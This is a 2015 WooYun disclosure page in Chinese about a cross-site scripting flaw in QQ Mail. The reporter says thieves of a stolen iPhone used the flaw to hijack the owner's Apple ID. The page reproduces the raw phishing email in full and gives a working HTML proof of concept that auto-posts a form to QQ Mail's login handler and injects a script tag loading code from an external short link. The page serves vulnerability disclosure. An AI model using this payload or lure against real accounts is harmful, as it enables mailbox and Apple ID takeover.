当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165343

漏洞标题:黑产在用的一枚QQ邮箱xss漏洞点击一下就上了你邮箱(iCloud黑产正在使用该漏洞)

相关厂商:腾讯

漏洞作者: 路人甲

提交时间:2015-12-28 10:56

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

2015年12月27日晚发生的事件,银河安全实验室说该漏洞腾讯已经修复
但是问题还是发生了。老婆的iphone6被偷,然后又拿了一台iphone6继续使用,appleID没有改,修改了密码,没有启动二次验证,安全邮箱是QQ邮箱。

详细说明:

12月初老婆手机丢了,报警,设置丢失模式,然后又拿了一个iphone6来用,用同一个ID,后来发现没有设置二次验证。appleID是微软的邮箱,安全邮箱是QQ邮箱。
一开始骗子各种钓鱼短信发来,没有理睬。后来月中的时候,看到一个提示iphone已经进入丢失模式,然后查找我的iphone进去就显示离线了,不能使用历史位置,估计乘半夜刷机开机,然后获取到appleID和安全邮箱。后来就各种钓鱼的邮件就来了,发到了微软邮箱的有,QQ邮箱的有。
有一天QQ邮箱收到一个自称收了一台手机的人的邮件,里面实际是一个图片,老婆第一时间转发给我了,我在电脑上点了一下图片链接,没有任何东西,我就没有在意了。图片上文字说有你手机的照片链接,还有留下一个QQ号码…………我用我的QQ加他没有理我。
27日我晚上想起这件事,我就用老婆的iphone QQ上去加了他的QQ,他马上同意,并且发来说你的手机我们收到,下面两个链接是图片和淘宝链接,我没有注意我就点了一下,我想我不输入任何东西和不下载,他应该没有啥办法。
但是一两分钟后,就出现了系统提示appleid 密码要求重新输入,马上打开查找iphone 就是密码不对。然后用另外一个设备进去马上通过密码问题把密码重设回来,查找iphone丢失的那台机器就不见了……

漏洞证明:

图片是邮件的显示图:

G3Vjq.png


图片的链接是:http://dwz.cn/2lVGYb
如下是邮件的全文:
QQ那边由于我已近删除了那个人,找不到聊天记录了……

X-QQ-FEAT: KC9GRaXB0Gq8E0BT6WVJjWFWHRWeUg99DKTctka+kmk4BDy/C3kdJmu3MPVS8
2Ffd+pOnuB+6LC419RHGcPx5Ghkcu8K6jX2SuXYAhLvQ4zt9G0V9mdMLQNfb4e07ewNr17r
zrvMCBBmK4rhn2AZw2xBnL5wYx9TuFhAW7oeofj5tRHJuWUMr0CsDNN8/bFDOLvWrrUcOU9
Cxqw5O9HTEuj7HyGl43GkZkREtfR+yfdH0jLHPpxYhawBK/8KP6oK6j3n1pDiQdusgD0stU
x9GTP4RDSgl2HA2d79lKII6/w=
X-QQ-SSF: 00010000000000F000000000010000Z
X-HAS-ATTACH: no
X-QQ-BUSINESS-ORIGIN: 2
X-Originating-IP: 120.236.111.136
X-QQ-STYLE:
X-QQ-mid: webmail515t1450923070t8164389
From: "=?gb18030?B?TG9sYc+y0e7R7g==?=" <287611272@qq.com>
To: "=?gb18030?B?SEVSTw==?=" <6705905@qq.com>
Subject: =?gb18030?B?16q3oqO6NzM3MDg0MDk2McTjtcQgytYnu/ogw9w=?=
=?gb18030?B?wuvL+MHL?=
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_567B543D_0B413360_398B6EF8"
Content-Transfer-Encoding: 8Bit
Date: Thu, 24 Dec 2015 10:11:09 +0800
X-Priority: 3
Message-ID: <tencent_5D676DB01E78428A3589BDEC@qq.com>
X-QQ-MIME: TCMime 1.0 by Tencent
X-Mailer: QQMail 2.x
X-QQ-Mailer: QQMail 2.x
This is a multi-part message in MIME format.
------=_NextPart_567B543D_0B413360_398B6EF8
Content-Type: text/plain;
charset="gb18030"
Content-Transfer-Encoding: base64
0KHNtbeiwLS1xNPKvP4NCg0KDQotLS0tLS0tLS0tLS0tLS0tLS0g1K3KvNPKvP4gLS0tLS0t
LS0tLS0tLS0tLS0tDQq3orz+yMs6ICJTdm91c3J5Ijs8eHVtZW5neWFuZ196cEBzdW55YXJk
LmNvbT47DQq3osvNyrG85DogMjAxNcTqMTLUwjIwyNUo0MfG2szsKSDN7cnPMTA6MTkNCsrV
vP7IyzogIkxvbGHPstHu0e4iPDI4NzYxMTI3MkBxcS5jb20+OyANCg0K1vfM4jogNzM3MDg0
MDk2McTjtcQgytYnu/ogw9zC68v4wcsNCg0KDQoNCiANCg0KICANCg0KICANCiANCiAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgIA0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCiAgICAgICDX8L60tcTTw7uno6zE
+tPaMjAxNS8xMS8xMyAyMDozMCDJ6sfrvavK1rv6seS4/M6qICAgICAgICBbMTM5OTYqKioq
MTYwMF3I57n7srvKx8T6sb7Iy6Gj
------=_NextPart_567B543D_0B413360_398B6EF8
Content-Type: text/html;
charset="gb18030"
Content-Transfer-Encoding: base64
PGRpdj7Qoc21t6LAtLXE08q8/jwvZGl2PjxkaXY+PGRpdj48YnI+PC9kaXY+PGRpdiBzdHls
ZT0iZm9udC1zaXplOiAxMnB4O2ZvbnQtZmFtaWx5OiBBcmlhbCBOYXJyb3c7cGFkZGluZzoy
cHggMCAycHggMDsiPi0tLS0tLS0tLS0tLS0tLS0tLSZuYnNwO9StyrzTyrz+Jm5ic3A7LS0t
LS0tLS0tLS0tLS0tLS0tPC9kaXY+PGRpdiBzdHlsZT0iZm9udC1zaXplOiAxMnB4O2JhY2tn
cm91bmQ6I2VmZWZlZjtwYWRkaW5nOjhweDsiPjxkaXY+PGI+t6K8/sjLOjwvYj4mbmJzcDsi
U3ZvdXNyeSI7Jmx0O3h1bWVuZ3lhbmdfenBAc3VueWFyZC5jb20mZ3Q7OzwvZGl2PjxkaXY+
PGI+t6LLzcqxvOQ6PC9iPiZuYnNwOzIwMTXE6jEy1MIyMMjVKNDHxtrM7Ckgze3JzzEwOjE5
PC9kaXY+PGRpdj48Yj7K1bz+yMs6PC9iPiZuYnNwOyJMb2xhz7LR7tHuIiZsdDsyODc2MTEy
NzJAcXEuY29tJmd0OzsgPHdicj48L2Rpdj48ZGl2PjwvZGl2PjxkaXY+PGI+1vfM4jo8L2I+
Jm5ic3A7NzM3MDg0MDk2McTjtcQgytYnu/ogw9zC68v4wcs8L2Rpdj48L2Rpdj48ZGl2Pjxi
cj48L2Rpdj4KCgoKPGRpdj48Zm9udCBmYWNlPSJAR3VsaW0iPjwvZm9udD48YnI+PC9kaXY+
CjxkaXY+CjxkaXY+PGJyPjwvZGl2Pgo8ZGl2Pgo8ZGl2PjwvZGl2Pgo8ZGl2PjwvZGl2Pgo8
ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8
ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8ZGl2Pgo8dGFibGUgc3R5bGU9Im1hcmdpbjogMHB4
IGF1dG8iIGlkPSJhYXBsLWZvb3RlciIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2Vs
bHBhZGRpbmc9IjAiIHdpZHRoPSI3MDAiIGFsaWduPSJjZW50ZXIiPgogIDx0Ym9keT4KICA8
dHI+CiAgICA8dGQgc3R5bGU9InBhZGRpbmctYm90dG9tOiAxMHB4OyBwYWRkaW5nLWxlZnQ6
IDEwcHg7IHBhZGRpbmctcmlnaHQ6IDEwcHg7IHBhZGRpbmctdG9wOiAyMHB4Ij4KICAgICAg
PGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6IDEuMzRlbTsgZm9udC1mYW1pbHk6IEdlbmV2YSwg
VmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZjsgY29sb3I6ICM5OTk5OTk7
IGZvbnQtc2l6ZTogOXB4Ij4KICAgICAgPGRpdj4KICAgICAgPGRpdiBzdHlsZT0id2lkb3dz
OiAyOyB0ZXh0LXRyYW5zZm9ybTogbm9uZTsgYmFja2dyb3VuZC1jb2xvcjogcmdiKDI1NSwy
NTUsMjU1KTsgdGV4dC1pbmRlbnQ6IDBweDsgZm9udDogMTRweC8xLjUgVmVyZGFuYTsgd2hp
dGUtc3BhY2U6IG5vcm1hbDsgb3JwaGFuczogMjsgbGV0dGVyLXNwYWNpbmc6IG5vcm1hbDsg
Y29sb3I6IHJnYigwLDAsMCk7IHdvcmQtc3BhY2luZzogMHB4OyB3ZWJraXQtdGV4dC1zaXpl
LWFkanVzdDogYXV0bzsgd2Via2l0LXRleHQtc3Ryb2tlLXdpZHRoOiAwcHgiPgogICAgICA8
ZGl2IHN0eWxlPSJsaW5lLWhlaWdodDogMS41Ij4KICAgICAgPGRpdiBzdHlsZT0ibGluZS1o
ZWlnaHQ6IDEuNSI+CiAgICAgIDxkaXYgc3R5bGU9IndpZG93czogMjsgdGV4dC10cmFuc2Zv
cm06IG5vbmU7IHRleHQtaW5kZW50OiAwcHg7IGZvbnQ6IDE0cHgvMjFweCBWZXJkYW5hOyB3
aGl0ZS1zcGFjZTogbm9ybWFsOyBvcnBoYW5zOiAyOyBsZXR0ZXItc3BhY2luZzogbm9ybWFs
OyBjb2xvcjogcmdiKDAsMCwwKTsgd29yZC1zcGFjaW5nOiAwcHgiPgogICAgICA8ZGl2IHN0
eWxlPSJsaW5lLWhlaWdodDogMS41Ij4KICAgICAgPGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6
IDEuNSI+CiAgICAgIDxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OiAxLjUiPgogICAgICA8ZGl2
IHN0eWxlPSJsaW5lLWhlaWdodDogMS41Ij4KICAgICAgPGRpdiBzdHlsZT0ibGluZS1oZWln
aHQ6IDEuNSI+CiAgICAgIDxkaXYgc3R5bGU9IndpZG93czogMjsgdGV4dC10cmFuc2Zvcm06
IG5vbmU7IGJhY2tncm91bmQtY29sb3I6IHJnYigyNTUsMjU1LDI1NSk7IHRleHQtaW5kZW50
OiAwcHg7IGZvbnQ6IDE0cHgvMjFweCBWZXJkYW5hOyB3aGl0ZS1zcGFjZTogbm9ybWFsOyBv
cnBoYW5zOiAyOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBjb2xvcjogcmdiKDAsMCwwKTsg
d29yZC1zcGFjaW5nOiAwcHgiPgogICAgICA8ZGl2IHN0eWxlPSJsaW5lLWhlaWdodDogMS41
Ij4KICAgICAgPGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6IDEuNSI+CiAgICAgIDxkaXYgc3R5
bGU9IndpZG93czogMjsgdGV4dC10cmFuc2Zvcm06IG5vbmU7IGJhY2tncm91bmQtY29sb3I6
IHJnYigyNTUsMjU1LDI1NSk7IHRleHQtaW5kZW50OiAwcHg7IGZvbnQ6IDE0cHgvMS41IFZl
cmRhbmE7IHdoaXRlLXNwYWNlOiBub3JtYWw7IG9ycGhhbnM6IDI7IGxldHRlci1zcGFjaW5n
OiBub3JtYWw7IGNvbG9yOiByZ2IoMCwwLDApOyB3b3JkLXNwYWNpbmc6IDBweCI+CiAgICAg
IDxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OiAxLjUiPgogICAgICA8ZGl2IHN0eWxlPSJsaW5l
LWhlaWdodDogMS41Ij4KICAgICAgPGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6IDEuNSI+CiAg
ICAgIDxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OiAxLjUiPgogICAgICA8ZGl2IHN0eWxlPSJ3
aWRvd3M6IDI7IHRleHQtdHJhbnNmb3JtOiBub25lOyB0ZXh0LWluZGVudDogMHB4OyBmb250
OiAxNHB4LzIxcHggVmVyZGFuYTsgd2hpdGUtc3BhY2U6IG5vcm1hbDsgb3JwaGFuczogMjsg
bGV0dGVyLXNwYWNpbmc6IG5vcm1hbDsgY29sb3I6IHJnYigwLDAsMCk7IHdvcmQtc3BhY2lu
ZzogMHB4Ij4KICAgICAgPGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6IDEuNSI+CiAgICAgIDxk
aXYgc3R5bGU9ImxpbmUtaGVpZ2h0OiAxLjUiPgogICAgICA8ZGl2IHN0eWxlPSJsaW5lLWhl
aWdodDogMS41Ij4KICAgICAgPGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6IDEuNSI+CiAgICAg
IDxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OiAxLjUiPgogICAgICA8ZGl2IHN0eWxlPSJ3aWRv
d3M6IDI7IHRleHQtdHJhbnNmb3JtOiBub25lOyBiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoMjU1
LDI1NSwyNTUpOyB0ZXh0LWluZGVudDogMHB4OyBmb250OiAxNHB4LzIzcHggJ2x1Y2lkYSBH
cmFuZGUnLCBWZXJkYW5hOyBXSElURS1TUEFDRTogbm9ybWFsOyBPUlBIQU5TOiAyOyBMRVRU
RVItU1BBQ0lORzogbm9ybWFsOyBDT0xPUjogcmdiKDAsMCwwKTsgV09SRC1TUEFDSU5HOiAw
cHgiPgogICAgICA8ZGl2IHN0eWxlPSJsaW5lLWhlaWdodDogMS41Ij4KICAgICAgPGRpdiBz
dHlsZT0ibGluZS1oZWlnaHQ6IDEuNSI+CiAgICAgIDxkaXYgc3R5bGU9IndpZG93czogMjsg
dGV4dC10cmFuc2Zvcm06IG5vbmU7IHRleHQtaW5kZW50OiAwcHg7IGZvbnQ6IDE0cHgvMjFw
eCBWZXJkYW5hOyB3aGl0ZS1zcGFjZTogbm9ybWFsOyBvcnBoYW5zOiAyOyBsZXR0ZXItc3Bh
Y2luZzogbm9ybWFsOyBjb2xvcjogcmdiKDAsMCwwKTsgd29yZC1zcGFjaW5nOiAwcHgiPgog
ICAgICA8ZGl2IHN0eWxlPSJsaW5lLWhlaWdodDogMS41Ij4KICAgICAgPGRpdiBzdHlsZT0i
bGluZS1oZWlnaHQ6IDEuNSI+CiAgICAgIDxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OiAxLjUi
PgogICAgICA8ZGl2IHN0eWxlPSJsaW5lLWhlaWdodDogMS41Ij4KICAgICAgPGRpdiBzdHls
ZT0ibGluZS1oZWlnaHQ6IDEuNSI+PHNwYW4gc3R5bGU9IndpZG93czogMjsgdGV4dC10cmFu
c2Zvcm06IG5vbmU7IGJhY2tncm91bmQtY29sb3I6IHJnYigyNTUsMjU1LDI1NSk7IHRleHQt
aW5kZW50OiAwcHg7IGRpc3BsYXk6IGlubGluZSAhaW1wb3J0YW50OyBmb250OiB4LXNtYWxs
LzE1cHggVmVyZGFuYTsgd2hpdGUtc3BhY2U6IG5vcm1hbDsgb3JwaGFuczogMjsgZmxvYXQ6
IG5vbmU7IGxldHRlci1zcGFjaW5nOiBub3JtYWw7IGNvbG9yOiByZ2IoMjU1LDI1NSwyNTUp
OyB3b3JkLXNwYWNpbmc6IDBweCI+CiAgICAgIDxkaXY+CiAgICAgIDxkaXY+CiAgICAgIDxk
aXY+PGEgaHJlZj0iaHR0cDovL2R3ei5jbi8ybFZHWWIiPjxpbWcgYm9yZGVyPSIwIiBoc3Bh
Y2U9IjAiIGFsaWduPSJiYXNlbGluZSIgc3JjPSJodHRwOi8vcGljLnl1cG9vLmNvbS9tYWls
MDEwL0ZiUWNrTFVFL0czVmpxLnBuZyI+PC9hPjwvZGl2PjwvZGl2PjwvZGl2Pjwvc3Bhbj48
L2Rpdj48L2Rpdj48L2Rpdj48L2Rpdj48L2Rpdj48L2Rpdj48L2Rpdj48L2Rpdj48L2Rpdj4K
ICAgICAgPGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6IDEuNSI+PGZvbnQgY29sb3I9IiNmZmZm
ZmYiPjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPtfwvrS1xNPDu6ejrMT609oyMDE1LzEx
LzEzIDIwOjMwIMnqx+u9q8rWu/qx5Lj8zqogCiAgICAgIFsxMzk5NioqKioxNjAwXcjnufuy
u8rHxPqxvsjLoaM8YnI+PC9mb250PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2Pjwv
ZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2Pjwv
ZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2Pjwv
ZGl2PjwvZGl2PjwvZGl2PjwvdGQ+PC90cj48L3Rib2R5PjwvdGFibGU+PC9kaXY+CjxkaXY+
PC9kaXY+CjxkaXY+CjxkaXYgc3R5bGU9IndpZG93czogMjsgdGV4dC10cmFuc2Zvcm06IG5v
bmU7IGJhY2tncm91bmQtY29sb3I6IHJnYigyNTUsMjU1LDI1NSk7IHRleHQtaW5kZW50OiAw
cHg7IGZvbnQ6IDE0cHgvMS41IFZlcmRhbmE7IHdoaXRlLXNwYWNlOiBub3JtYWw7IG9ycGhh
bnM6IDI7IGxldHRlci1zcGFjaW5nOiBub3JtYWw7IGNvbG9yOiByZ2IoMCwwLDApOyB3b3Jk
LXNwYWNpbmc6IDBweDsgd2Via2l0LXRleHQtc2l6ZS1hZGp1c3Q6IGF1dG87IHdlYmtpdC10
ZXh0LXN0cm9rZS13aWR0aDogMHB4Ij4KPGRpdiBjbGFzcz0iaGQiPgo8aDE+PGZvbnQgY29s
b3I9IndoaXRlIj4KPGgxPgo8ZGl2PjwvZGl2PjwvaDE+PC9mb250Pgo8ZGl2PjwvZGl2Pjwv
aDE+PC9kaXY+PC9kaXY+PC9kaXY+CjxkaXY+PC9kaXY+CjxkaXY+PC9kaXY+CjxkaXY+PC9k
aXY+PC9kaXY+PC9kaXY+CjxkaXY+PC9kaXY+CjxkaXY+PC9kaXY+PC9kaXY+PC9kaXY+Cjxk
aXY+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PC9k
aXY+PC9kaXY+CjxkaXY+PC9kaXY+CjxzdHlsZT48L3N0eWxlPgoKPGRpdj48L2Rpdj48L2Rp
dj48L2Rpdj48L2Rpdj4=
------=_NextPart_567B543D_0B413360_398B6EF8--


利用代码如下:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>test</title>
</head>
<body>
<script>
function test(PARAMS){
var temp = document.createElement("form");
temp.acceptCharset="utf-8";
temp.action = 'http://mail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin:'aaaa',
domain:'bbbb&quot;;return false;\&quot;&lt;/script&gt;&lt;script src=http://t.cn/R4Zns84&gt;&lt;/script&gt;',
aliastype:'other',
});
</script>
</body>
</html>


测试效果如下:

F3F6BA56-0D9E-4569-B432-ADC9202851BD.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-12-28 17:23

厂商回复:

非常感谢您的报告,该问题其它白帽子已在腾讯安全应急响应中心报告过,我们正在积极修复中。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无